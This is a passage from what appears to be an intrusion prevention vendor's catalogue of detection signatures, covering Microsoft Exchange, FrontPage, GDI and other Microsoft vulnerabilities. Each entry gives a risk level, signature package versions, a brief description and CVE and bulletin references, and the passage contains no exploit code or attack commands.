Back to top

Microsoft-Exchange-PowerShell-Insecure-Deserialization-CVE-2023-36777

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1663-5242
Last changed: sgpkg-ips-1663-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure in the security context of SYSTEM.
Situation: File-TextId_Microsoft-Exchange-Approvedapplication-Insecure-Deserialization
References:
CVE-2023-36777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36777
ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep
Back to top

Microsoft-Exchange-PowerShell-Mobilemailboxpolicy-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1690-5242
Last changed: sgpkg-ips-1690-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure and spoofing.
Situation: File-TextId_Microsoft-Exchange-PowerShell-Mobilemailboxpolicy-Insecure-Deserialization
References:
CVE-2023-36035
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36035
ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov
Back to top

Microsoft-Exchange-PowerShell-Remoting-Command-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1607-5242
Last changed: sgpkg-ips-1607-5242
Platform: Windows
Software: Microsoft Exchange Server
Type: Input Validation
Description: Improper validation of objects in the PowerShell Remoting feature causes a deserialization in vulnerability that can be exploited to execute arbitrary commands on the target system with system privileges.
Situation: File-TextId_Microsoft-Exchange-Unsafe-Deserialization
References:
CVE-2023-32031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32031
Back to top

Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1638-5242
Last changed: sgpkg-ips-1638-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary file upload and in the worst case code execution under the security context of SYSTEM.
Situation: File-TextId_Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization
References:
CVE-2023-36744
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36744
ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep
Back to top

Microsoft-Exchange-PowerShell-Remoting-Federationtrust-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure in the context of SYSTEM.
Situation: File-TextId_Microsoft-Exchange-PowerShell-Remoting-Federationtrust-Insecure-Deserialization
References:
CVE-2023-36039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36039
ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov
Back to top

Microsoft-Exchange-PowerShell-Remoting-Gsmwriter-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1672-5242
Last changed: sgpkg-ips-1672-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in denial of service conditions or information disclosure in the context of SYSTEM.
Situation: File-TextId_Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization
References:
CVE-2023-38181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38181
ms23-aug
http://technet.microsoft.com/security/bulletin/ms23-aug
Back to top

Microsoft-Exchange-PowerShell-Remoting-Xamlimageinfo-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: Microsoft Exchange Server
Type: Input Validation
Description: Improper validation of objects in the PowerShell Remoting feature causes a vulnerability in Powershell. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Microsoft-Exchange-PowerShell-Remoting-Xamlimageinfo-Insecure-Deserialization
Back to top

Microsoft-Exchange-Privilege-Escalation-Exploit

About this vulnerability: A vulnerability in Microsoft Exchange
Risk: High
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exchange Server
Type: Insecure Configuration
Description: A vulnerability in Microsoft Exchange 2013 and 2016 which allows remote attackers to bypass authentication by forcing Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature.
Situation: HTTP_CRL-Microsoft-Exchange-Privilege-Escalation-Exploit
References:
CVE-2019-0724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0724
Back to top

Microsoft-Exchange-Privilege-Escalation-Exploit-CVE-2018-8581

About this vulnerability: A vulnerability in Microsoft Exchange
Risk: High
First detected in: sgpkg-ips-1308-5242
Last changed: sgpkg-ips-1308-5242
Platform: Generic
Software: Exchange Server
Type: Insecure Configuration
Description: An elevation of privilege vulnerability exists in Microsoft Exchange Server which permits an attacker to gain access to a victims emails.
Situation: HTTP_CRL-Microsoft-Exchange-Privilege-Escalation-Exploit
References:
CVE-2018-8581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8581
Back to top

Microsoft-Exchange-ProxyShell-RCE

About this vulnerability: A vulnerability in Microsoft Exchange Server devices.
Risk: High
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: A vulnerability in Microsoft Exchange Server, versions 2013 CU23 < 15.0.1497.15, 2016 CU19 < 15.1.2176.12, 2016 CU20 < 15.1.2242.5, 2019 CU8 < 15.2.792.13, 2019 CU9 < 15.2.858.9, which allows remote attackers to execute arbitrary commands via an arbitrary file write utilizing user impersonation.
Situation: HTTP_CRL-Microsoft-Exchange-ProxyShell-RCE
References:
CVE-2021-34473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473
Back to top

Microsoft-Exchange-Server-CVE-2022-23277-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: A remote code execution vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper handling of EWS requests containing malicious UserConfiguration objects. This vulnerability is due to an incomplete fix of CVE-2021-42321. A remote, authenticated attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in remote code execution in the security context of the SYSTEM user.
Situation: File-TextId_Microsoft-Exchange-Server-CVE-2022-23277-Insecure-Deserialization
References:
CVE-2022-23277
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23277
ms22-mar
http://technet.microsoft.com/security/bulletin/ms22-mar
Back to top

Microsoft-Exchange-Server-CVE-2022-24463-External-Entity-Injection

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1455-5242
Last changed: sgpkg-ips-1455-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: A information disclosure vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to a flaw in OneDriveProUtilities class. A remote, authenticated attacker can exploit this vulnerability by sending crafted traffic to the target system. Successful exploitation could result in information disclosure on the target server.
Situation: File-TextId_Microsoft-Exchange-Server-CVE-2022-24463-External-Entity-Injection
References:
CVE-2022-24463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24463
ms22-mar
http://technet.microsoft.com/security/bulletin/ms22-mar
Back to top

Microsoft-Exchange-Server-Elevation-Of-Privilege-Vulnerability-CVE-2022-41080

About this vulnerability: An attempt to exploit a vulnerability in Exchange Server detected
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: Microsoft Exchange Server Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-41123.
Situation: HTTP_CSU_Microsoft-Exchange-Server-Elevation-Of-Privilege-Vulnerability-CVE-2022-41080
References:
CVE-2022-41080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41080
Back to top

Microsoft-Exchange-Server-Ews-Userconfiguration-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1309-5242
Last changed: sgpkg-ips-1309-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: A remote code execution vulnerability has been reported in Microsoft Exchange Server 2010. The vulnerability is due to improper handling of malicious EWS requests. An authenticated, remote attacker can exploit the vulnerability by sending crafted requests to the vulnerable Exchange server. Successful exploitation could result in the remote code execution in the context of the System user.
Situation: File-TextId_Microsoft-Exchange-Server-Ews-Userconfiguration-Insecure-Deserialization
References:
CVE-2020-17144
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17144
ms20-dec
http://technet.microsoft.com/security/bulletin/ms20-dec
Back to top

Microsoft-Exchange-Server-ExportExhangeCertificate-Arbitrary-File-Write

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1310-5242
Last changed: sgpkg-ips-1310-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: An arbitrary file write vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of Filename argument in Export-ExchangeCertificate cmdlet. A remote, authenticated attacker can exploit this vulnerability by running ExchangeCertificate cmdlet with crafted arguments against a vulnerable Exchange server. Successful exploitation could result in arbitrary file write and can be leveraged to execute arbitrary codes as SYSTEM.
Situation: File-TextId_Microsoft-Exchange-Server-ExportExhangeCertificate-Arbitrary-File-Write
References:
CVE-2020-17083
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17083
ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov
Back to top

Microsoft-Exchange-Server-ICalendar-DOS

About this vulnerability: Null Pointer dereference in Exchange Server allows Denial of Service
Risk: High
First detected in: sgpkg-ips-107-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: There is a denial of service vulnerability in Microsoft Exchange Server, due to the way Microsoft Exchange Server handles calendar content requests, known asiCal. The vulnerability is a result of NULL pointer dereference when processing crafted iCalendar objects inside email messages. Successful exploitation of this vulnerability can allow a remote unauthenticated attacker to terminate the Microsoft Exchange Information Store service.
Situation: SMTP_Microsoft-Exchange-Server-iCal-Denial-Of-Service
References:
CVE-2007-0039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0039
BID-23808
http://www.securityfocus.com/bid/23808
OSVDB-34391
http://www.osvdb.org/34391
MS07-026
http://technet.microsoft.com/security/bulletin/MS07-026
Back to top

Microsoft-Exchange-Server-ImportTransportRuleCollection-RCE

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1323-5242
Last changed: sgpkg-ips-1323-5242
Platform: Generic
Software: Exchange Server
Type: Input Validation
Description: There exists a vulnerability in Microsoft Exchange Server, versions 2013 Cumulative Update 23, 2016 Cumulative Update 17 and 18, 2019 Cumulative Update 6 and 7, which allows remote attackers to execute arbitrary code due to the insufficient validation of arguments in ImportTransportRuleCollection cmdlet.
Situation: HTTP_CRL-Microsoft-Exchange-Server-ImportTransportRuleCollection-RCE
References:
CVE-2020-17117
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17117
Back to top

Microsoft-Exchange-Server-Mime-Base64-Decoding-Code-Execution

About this vulnerability: Buffer overflow vulnerability in Microsoft Exchange Server
Risk: Critical
First detected in: sgpkg-ips-107-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Exchange Server. A remote unauthenticated attacker can exploit this vulnerability by sending an email message with malformed Base64 encoded MIME content to cause a denial of service or compromise the vulnerable system.
Situation: SMTP_Microsoft-Exchange-Server-Mime-Base64-Decoding-Code-Execution
References:
CVE-2007-0213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0213
BID-23809
http://www.securityfocus.com/bid/23809
OSVDB-34391
http://www.osvdb.org/34391
MS07-026
http://technet.microsoft.com/security/bulletin/MS07-026
Back to top

Microsoft-Exchange-Server-NewExchangeCertificate-Arbitrary-File-Write

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: An arbitrary file write vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of Filename argument in New-ExchangeCertificate cmdlet. A remote, authenticated attacker can exploit this vulnerability by running the cmdlet with crafted arguments against a vulnerable Exchange server. Successful exploitation could result in denial-of-service conditions and in worst case execution of arbitrary codes as SYSTEM.
Situation: File-TextId_Microsoft-Exchange-Server-NewExchangeCertificate-Arbitrary-File-Write
References:
CVE-2020-17085
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17085
ms20-nov
http://technet.microsoft.com/security/bulletin/ms20-nov
Back to top

Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection

About this vulnerability: Script code injection vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-72-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server
Type: Code Injection
Description: Microsoft Exchange Server has a script code injection vulnerability. The vulnerability can be exploited by sending a crafted email message to the target server and persuading a target user to open the message using Outlook Web Access. When the vulnerability is triggered it leads to arbitrary script code execution in the security context of the client's browser.
Situation: E-Mail_BS-Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection
File-Text_Microsoft-Exchange-Server-Outlook-Web-Access-Script-Injection
References:
CVE-2006-1193
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1193
BID-18381
http://www.securityfocus.com/bid/18381
OSVDB-26441
http://www.osvdb.org/26441
MS06-029
http://technet.microsoft.com/security/bulletin/MS06-029
Back to top

Microsoft-Exchange-Server-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1411-5242
Last changed: sgpkg-ips-1411-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: There exists a reflected cross-site scripting vulnerability in Microsoft Exchange Server. Successful exploitation could lead in arbitrary script code execution on the target browser.
Situation: HTTP_CRL-Microsoft-Exchange-Server-Reflected-Cross-Site-Scripting
References:
CVE-2021-41349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41349
Back to top

Microsoft-Exchange-Server-SSRF-Vulnerability-CVE-2021-26855

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1325-5242
Last changed: sgpkg-ips-1325-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: There exists a server-side request forgery vulnerability in Microsoft Exchange Server. Successful exploitation could lead in remote code execution.
Situation: HTTP_CSH-Microsoft-Exchange-Server-SSRF-Vulnerability-CVE-2021-26855
References:
CVE-2021-26855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855
Back to top

Microsoft-Exchange-Sharedtyperesolver-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: High
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Windows
Software: Microsoft Exchange Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.
Situation: File-TextId_Microsoft-Exchange-Approvedapplication-Insecure-Deserialization
References:
CVE-2023-36745
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36745
Back to top

Microsoft-Exchange-SSRF-CVE-2021-34473

About this vulnerability: A vulnerability in Microsoft Exchange
Risk: High
First detected in: sgpkg-ips-1369-5242
Last changed: sgpkg-ips-1510-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: A server side request forgery vulnerability has been reported in the EwsAutodiscoverProxyRequestHandler component of Microsoft Exchange. The vulnerability is due to insufficient handling of explicit logon requests to the autodiscover component of Exchange. An unauthenticated, remote attacker can exploit this vulnerability by sending a crafted request to the vulnerable Exchange server. Successful exploitation results in requests being made to backend servers with administrative privileges.
Situation: HTTP_CRL-Microsoft-Exchange-SSRF-CVE-2021-34473
HTTP_CRL-Microsoft-Exchange-SSRF-CVE-2021-34473-2
HTTP_CRH-Microsoft-Exchange-SSRF-CVE-2021-34473
References:
CVE-2021-34473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473
ms21-jul
http://technet.microsoft.com/security/bulletin/ms21-jul
Back to top

Microsoft-Exchange-SSRF-CVE-2022-41040

About this vulnerability: A vulnerability in Microsoft Exchange
Risk: High
First detected in: sgpkg-ips-1509-5242
Last changed: sgpkg-ips-1532-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: Two zero-day vulnerabilities affecting Microsoft Exchange Server have been reported to Microsoft. The first one, identified as CVE-2022-41040, is a Server-Side Request Forgery (SSRF) vulnerability, and the second one, identified as CVE-2022-41082, allows Remote Code Execution (RCE) when PowerShell is accessible to the attacker.
Situation: HTTP_CSU-Microsoft-Exchange-SSRF-CVE-2022-41040
References:
CVE-2022-41040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040
Back to top

Microsoft-Exchange-TNEF-Buffer-Overflow-MS09-003

About this vulnerability: Microsoft Exchange TNEF Code Execution
Risk: High
First detected in: sgpkg-ips-205-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Exchange Server 2000; Exchange Server 2003; Exchange Server 2007
Type: Buffer Overflow
Description: There is a Integer Underflow vulnerability exists in the way Microsoft Exchange Server handles email messages. The vulnerability is a result of insufficient boundary checking when decoding the Transport Neutral Encapsulation Format (TNEF) data for a message. An attacker can exploit this vulnerability for code execution by sending a specially crafted email to an account on the target server. Any code injected using this vulnerability would be executed in the System security context. An attack targeting this vulnerability can result in the injection and execution of code. If code execution is successful, the behaviour of the target will depend on the intention of the attacker. Note that any code injected will be executed within the security context of the Exchange Server application, normally System
Situation: SMTP_CS-Microsoft-Exchange-TNEF-Decoding-MS09-003-Bp
E-Mail_BS-Microsoft-Exchange-TNEF-Decoding-MS09-003-Buffer-Overflow
File-Binary_Microsoft-Exchange-TNEF-Decoding-MS09-003-Buffer-Overflow
References:
CVE-2009-0098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0098
OSVDB-51837
http://www.osvdb.org/51837
MS09-003
http://technet.microsoft.com/security/bulletin/MS09-003
Back to top

Microsoft-Exchange-Transportconfigcontainer-Insecure-Deserialization

About this vulnerability: A vulnerability in Microsoft Exchange Server
Risk: Moderate
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Platform: Windows
Software: Exchange Server
Type: Input Validation
Description: An insecure deserialization vulnerability has been reported in Microsoft Exchange Server. The vulnerability is due to improper validation of objects in the PowerShell Remoting feature. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure in the context of SYSTEM.
Situation: File-TextId_Microsoft-Exchange-Transportconfigcontainer-Insecure-Deserialization
References:
CVE-2023-36050
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36050
ms23-nov
http://technet.microsoft.com/security/bulletin/ms23-nov
Back to top

Microsoft-Exchange-Unsafe-Deserialization-CVE-2022-41082

About this vulnerability: A vulnerability in Microsoft Exchange
Risk: High
First detected in: sgpkg-ips-1530-5242
Last changed: sgpkg-ips-1599-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: The attacker for this vulnerability could target the server accounts in an arbitrary or remote code execution. As an authenticated user, the attacker could attempt to trigger malicious code in the context of the server's account through a network call.
Situation: File-TextId_Microsoft-Exchange-Unsafe-Deserialization
References:
CVE-2022-41082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082
Back to top

Microsoft-Exchange-Unsafe-Deserialization-CVE-2023-21529

About this vulnerability: An attempt to exploit a vulnerability in Exchange Server detected
Risk: High
First detected in: sgpkg-ips-1556-5242
Last changed: sgpkg-ips-1599-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: An unsafe deserialization issue has been identified in Microsoft Exchange server. This vulnerability can be exploited to achieve remote code execution.
Situation: File-TextId_Microsoft-Exchange-Unsafe-Deserialization
References:
CVE-2023-21529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21529
ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb
Back to top

Microsoft-Exchange-Unsafe-Deserialization-CVE-2023-21706

About this vulnerability: An attempt to exploit a vulnerability in Exchange Server detected
Risk: High
First detected in: sgpkg-ips-1556-5242
Last changed: sgpkg-ips-1599-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: An unsafe deserialization issue has been identified in Microsoft Exchange server. This vulnerability can be exploited to achieve remote code execution.
Situation: File-TextId_Microsoft-Exchange-Unsafe-Deserialization
References:
CVE-2023-21706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21706
ms23-feb
http://technet.microsoft.com/security/bulletin/ms23-feb
Back to top

Microsoft-Exchange-Validation-Key-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Exchange
Risk: High
First detected in: sgpkg-ips-1232-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a vulnerability in Exchange Control Panel (ECP) component. The ECP component is using s static validation key that can lead in arbitrary code execution on the target system. This situation can generate false-positive events on unpatched Microsoft Exchange systems.
Situation: HTTP_CRL-Microsoft-Exchange-Validation-Key-Remote-Code-Execution
References:
CVE-2020-0688
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0688
Back to top

Microsoft-Exchange-XSS-CVE-2015-1632

About this vulnerability: A vulnerability in Microsoft Exchange
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Exchange Server
Type: Cross-site Scripting
Description: A vulnerability in Microsoft Exchange
Situation: HTTP_CSU-Microsoft-Exchange-XSS-CVE-2015-1632
References:
CVE-2015-1632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1632
MS15-026
http://technet.microsoft.com/security/bulletin/MS15-026
Back to top

Microsoft-Explorer-Long-Share-Name-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: A buffer overflow has been found in Microsoft Windows Explorer and Internet Explorer that can be exploited with an excessively long share name. This vulnerability exists in all versions of Windows including 98, ME, 2000, and XP. In the remote exploit case it is expected that an attack against a vulnerable Windows server will crash the Windows Explorer or Internet Explorer and trigger a buffer overflow error upon receiving a malformed packet, leading to a denial of service. It is also possible for a remote attacker, using a properly crafted share name, to execute arbitrary code running in the context of the presently logged in user.
Situation: NetBIOS-TCP_Microsoft-Explorer-Long-Share-Name-Buffer-Overflow
References:
CVE-2004-0214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0214
BID-10213
http://www.securityfocus.com/bid/10213
OSVDB-5687
http://www.osvdb.org/5687
MS04-037
http://technet.microsoft.com/security/bulletin/MS04-037
Back to top

Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1639-5242
Platform: Windows
Software: Microsoft Expression Design
Type: Malfunction
Description: There is a vulnerability in Microsoft Expression Design.
Situation: HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016
References:
CVE-2012-0016
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0016
MS12-022
http://technet.microsoft.com/security/bulletin/MS12-022
Back to top

Microsoft-Filter-Manager-Elevation-Of-Privilege-Vulnerability-CVE-2018-8333

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Windows. A remote attacker can use this to execute arbitrary code on the affected system.
Situation: SMB-TCP_SS-Microsoft-Filter-Manager-Elevation-Of-Privilege-Vulnerability-CVE-2018-8333
References:
CVE-2018-8333
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8333
ms18-oct
http://technet.microsoft.com/security/bulletin/ms18-oct
Back to top

Microsoft-Forefront-Unified-Access-Gateway-Signurl.asp-XSS

About this vulnerability: A vulnerability in Microsoft Forefront Unified Access Gateway
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Forefront Unified Access Gateway
Type: Cross-site Scripting
Description: A cross-site scripting vulnerability exists in Microsoft Forefront Unified Access Gateway (UAG). The vulnerability is due to insufficient validation of user-supplied input in signurl.asp. A remote attacker can exploit this flaw by enticing a target to open a malicious URL link. Successful exploitation would result in compromise of web browser cookies (including authentication cookies) associated with the site, and modification of user information.
Situation: File-Text_Microsoft-Forefront-Unified-Access-Gateway-Signurl.asp-XSS
References:
CVE-2010-3936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3936
MS10-089
http://technet.microsoft.com/security/bulletin/MS10-089
Back to top

Microsoft-FrontPage-Information-Disclosure-Vulnerability

About this vulnerability: A vulnerability in Microsoft FrontPage
Risk: High
First detected in: sgpkg-ips-542-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft FrontPage
Type: Malfunction
Description: There is an information disclosure vulnerability in Microsoft FrontPage.
Situation: File-TextId_Microsoft-FrontPage-Information-Disclosure-Vulnerability
References:
CVE-2013-3137
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3137
MS13-078
http://technet.microsoft.com/security/bulletin/MS13-078
Back to top

Microsoft-FrontPage-Server-Extensions-MS-DOS-Device-Name-Denial-Of-Service

About this vulnerability: A vulnerability in Microsoft FrontPage
Risk: High
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Microsoft FrontPage
Type: Malfunction
Description: The shtml.exe component of Microsoft FrontPage 2000 Server Extensions 1.1 allows remote attackers to cause a denial of service in some components by requesting a URL whose name includes a standard DOS device name.
Situation: HTTP_CSU-Microsoft-FrontPage-Server-Extensions-MS-DOS-Device-Name-Denial-Of-Service
References:
CVE-2000-0710
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0710
BID-1608
http://www.securityfocus.com/bid/1608
Back to top

Microsoft-GDI-Vulnerability-CVE-2009-2501

About this vulnerability: Microsoft GDI+ vulnerability MS09-061
Risk: High
First detected in: sgpkg-ips-258-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: Microsoft Windows GDI+ parser vulnerability MS09-061.
Situation: HTTP_SS-Microsoft-GDI-Vulnerability-CVE-2009-2501
File-PNG_Microsoft-Multiple-Products-Buffer-Overflow
References:
CVE-2009-2501
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2501
MS09-061
http://technet.microsoft.com/security/bulletin/MS09-061
Back to top

Microsoft-Graphics-Component-Createcolorspacew-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a vulnerability in the GDI component of Microsoft Windows detected
Situation: File-Binary_Microsoft-Graphics-Component-Createcolorspacew-Information-Disclosure
File-Binary_Microsoft-Graphics-Component-Createcolorspace-Information-Disclosure2
References:
CVE-2016-0168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0168
MS16-055
http://technet.microsoft.com/security/bulletin/MS16-055
Back to top

Microsoft-Graphics-Component-CVE-2016-0169-Information-Disclosure

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
